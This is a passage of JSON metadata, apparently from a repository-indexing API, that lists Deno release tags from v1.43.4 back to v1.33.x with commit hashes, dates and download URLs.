itHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.